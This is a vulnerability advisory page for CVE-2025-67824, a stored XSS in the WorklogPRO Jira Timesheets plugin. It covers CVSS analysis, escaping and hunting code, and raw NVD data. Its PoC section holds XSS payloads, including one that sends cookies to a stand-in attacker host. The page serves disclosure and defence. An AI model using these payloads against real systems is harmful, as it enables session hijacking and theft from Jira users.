Security Vulnerability Report
CVE-2025-67824 CVSS 6.1 MEDIUM

CVE-2025-67824

Published: 2026-01-20 16:16:07
Last Modified: 2026-04-15 00:35:42

Description

The WorklogPRO - Jira Timesheets plugin for Jira Data Center, in versions before 4.24.2-jira9, 4.24.2-jira10 and 4.24.2-jira11, is vulnerable to stored cross-site scripting (XSS, CWE-79). An attacker stores a crafted HTML or JavaScript payload in the name of a Jira filter. The payload runs in the browser of any user who opens the custom timesheet dialog and creates a timesheet of the filter timesheet type, because the plugin renders the filter name into that dialog without proper escaping.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Reading the vector: UI:R because a victim must open the custom timesheet dialog and create a timesheet of the filter type; S:C because, as with most XSS, the payload runs in the victim's browser session rather than inside the plugin itself; C:L/I:L because the script can read and act on whatever the victim's session exposes in the Jira origin. PR:N is how the record is scored, but saving the Jira filter that carries the payload normally requires an authenticated Jira account, so for prioritization the realistic attacker is a low-privileged user of the instance.

Configurations (Affected Products)

No NVD configuration (CPE) data is attached to this record. Affected versions, taken from the description, with the corresponding fixed release in each line:

WorklogPRO Jira Timesheets plugin < 4.24.2-jira9 (builds for Jira 9)
WorklogPRO Jira Timesheets plugin < 4.24.2-jira10 (builds for Jira 10)
WorklogPRO Jira Timesheets plugin < 4.24.2-jira11 (builds for Jira 11)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-67824 PoC - Stored XSS via Filter Name
// Target: WorklogPRO - Jira Timesheets plugin

// Malicious filter name payload
const maliciousPayload =
  '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';

// Attack scenario:
// 1. Create a new filter with the malicious name
// 2. Go to Timesheets -> Custom Timesheet Dialog
// 3. Select the filter with the malicious name as the timesheet type
// 4. The XSS payload is executed when the dialog renders

// Example filter creation request body (authenticated user):
const filterData = {
  name: maliciousPayload,
  jql: 'project IS NOT EMPTY',
  description: 'Benign description'
};

// The filter name is stored without sanitization.
// When other users build timesheets from this filter, the XSS triggers.

// Simplified XSS payload variants:
// 1. <script>alert('XSS')</script>
// 2. <img src=x onerror=alert('XSS')>
// 3. <svg onload=alert('XSS')>
// 4. <body onload=alert('XSS')>
```

Two practical notes on this PoC. Variant 1 only fires if the name reaches the page in a way that executes script elements; a name inserted through innerHTML does not run `<script>` elements, so the event-handler variants (2 to 4) are the ones to test with. The cookie-theft payload also overstates the impact: Jira's session cookie (JSESSIONID) is normally set HttpOnly by the Tomcat container, so `document.cookie` will not return it; a realistic payload instead issues requests to Jira's REST API from inside the victim's session.
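As an added example, not code from the advisory or from the WorklogPRO plugin: the rendering pattern that turns a filter name into markup (the bug class the description and the PoC above describe), the escaping that closes it, and a hunting check an administrator can run over Jira's filter listing to find names that were planted. The function names, the regular expressions and the sample filter records are constructed for illustration; the record shape mirrors only the id, name and owner fields of Jira's filter REST output.

```javascript
// Added example for CVE-2025-67824: not from the advisory or the WorklogPRO
// plugin. Function names, regexes and sample data are assumptions.

// Constructed sample of filter records (id, name, owner fields only, the
// shape Jira's filter REST resources return for those fields).
const SAMPLE_FILTERS = [
  { id: '10001', name: 'My open issues', owner: { name: 'alice' } },
  { id: '10002', name: '<img src=x onerror=alert(1)>', owner: { name: 'mallory' } },
  { id: '10003', name: 'Sprint 42 <QA>', owner: { name: 'bob' } },
  { id: '10004', name: 'Bugs & features', owner: { name: 'carol' } },
];

// Vulnerable pattern: the timesheet-type <option> is built by string
// concatenation, so the browser parses the filter name as HTML.
function renderOptionVulnerable(filter) {
  return '<option value="' + filter.id + '">' + filter.name + '</option>';
}

// Escape the five characters that matter for text between tags and inside
// double- or single-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: same markup, every untrusted value escaped. In a real
// dialog prefer document.createElement plus textContent over innerHTML; the
// string form is used here so the example runs under Node without a DOM.
function renderOptionSafe(filter) {
  return '<option value="' + escapeHtml(filter.id) + '">' +
    escapeHtml(filter.name) + '</option>';
}

// Hunting check: flag filter names that contain a tag, an inline event
// handler, or a javascript: URL. Names with bare angle brackets are
// reported too: with the vulnerable renderer they are parsed as tags.
const TAG_RE = /<\s*\/?\s*[a-z][\w-]*/i;
const HANDLER_RE = /\bon[a-z]+\s*=/i;
const SCHEME_RE = /javascript\s*:/i;

function isSuspiciousName(name) {
  return TAG_RE.test(name) || HANDLER_RE.test(name) || SCHEME_RE.test(name);
}

function findSuspiciousFilterNames(filters) {
  return filters
    .filter((f) => isSuspiciousName(f.name))
    .map((f) => ({ id: f.id, owner: f.owner ? f.owner.name : null, name: f.name }));
}

// Demo: show both renderings of each name and the hunting result.
for (const f of SAMPLE_FILTERS) {
  console.log('vulnerable:', renderOptionVulnerable(f));
  console.log('hardened:  ', renderOptionSafe(f));
}
console.log('flagged:', JSON.stringify(findSuspiciousFilterNames(SAMPLE_FILTERS)));
```

To use the hunting check against a live instance, feed it the JSON from Jira's filter REST resources (the favourite, search or per-id filter endpoints) and review each flagged record with its owner; the bare-bracket hits are expected noise, the event-handler hits are the ones to escalate.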

References

https://marketplace.atlassian.com/apps/1212626/worklogpro-timesheets-for-jira/version-history (Atlassian Marketplace version history for the plugin)
https://thestarware.atlassian.net/wiki/x/CAAdyg (vendor wiki page)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-67824",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T16:16:06.517",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WorklogPRO - Jira Timesheets plugin in the Jira Data Center before 4.24.2-jira9, 4.24.2-jira10 and 4.24.2-jira11 allows attackers to inject arbitrary HTML or JavaScript via XSS. This is exploited via a crafted payload placed in the name of a filter. This code is executed in the browser when the user attempts to create a timesheet with the filter timesheet type on the custom timesheet dialog because the filter name is not properly sanitized during the action."
      },
      {
        "lang": "es",
        "value": "El plugin WorklogPRO - Jira Timesheets en el Jira Data Center antes de 4.24.2-jira9, 4.24.2-jira10 y 4.24.2-jira11 permite a los atacantes inyectar HTML o JavaScript arbitrario a través de XSS. Esto se explota a través de una carga útil manipulada colocada en el nombre de un filtro. Este código se ejecuta en el navegador cuando el usuario intenta crear una hoja de horas con el tipo de hoja de horas de filtro en el diálogo de hoja de horas personalizada porque el nombre del filtro no se sanea correctamente durante la acción."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://marketplace.atlassian.com/apps/1212626/worklogpro-timesheets-for-jira/version-history",
        "source": "[email protected]"
      },
      {
        "url": "https://thestarware.atlassian.net/wiki/x/CAAdyg",
        "source": "[email protected]"
      }
    ]
  }
}